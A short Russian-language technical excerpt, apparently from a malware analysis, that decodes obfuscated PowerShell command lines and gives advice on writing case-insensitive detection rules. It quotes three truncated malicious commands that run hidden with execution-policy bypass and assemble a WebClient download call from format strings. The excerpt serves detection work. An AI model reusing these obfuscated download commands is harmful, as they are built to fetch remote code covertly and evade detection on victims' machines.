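Техническая информация
Командные строки ниже обрезаны источником («...»), поэтому для точного сопоставления они не годятся. Параметры -NoniNTeRaCtivE, -NoPr, -exeCuTi ByPASS и -WinDO hIDDen — сокращённые и записанные в смешанном регистре формы -NonInteractive, -NoProfile, -ExecutionPolicy Bypass и -WindowStyle Hidden, так что правила обнаружения должны быть нечувствительны к регистру и учитывать сокращения параметров. Строки, собранные оператором -f и конкатенацией, раскрываются в new-object, system.net.webclient и начало имени метода «downloadf…»; sleep 900 внутри do{…} задаёт паузу в 900 секунд, а условие цикла находится в обрезанной части и здесь не видно.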
- '<SYSTEM32>\cmd.exe' /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('...
- '<SYSTEM32>\cmd.exe' /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadf...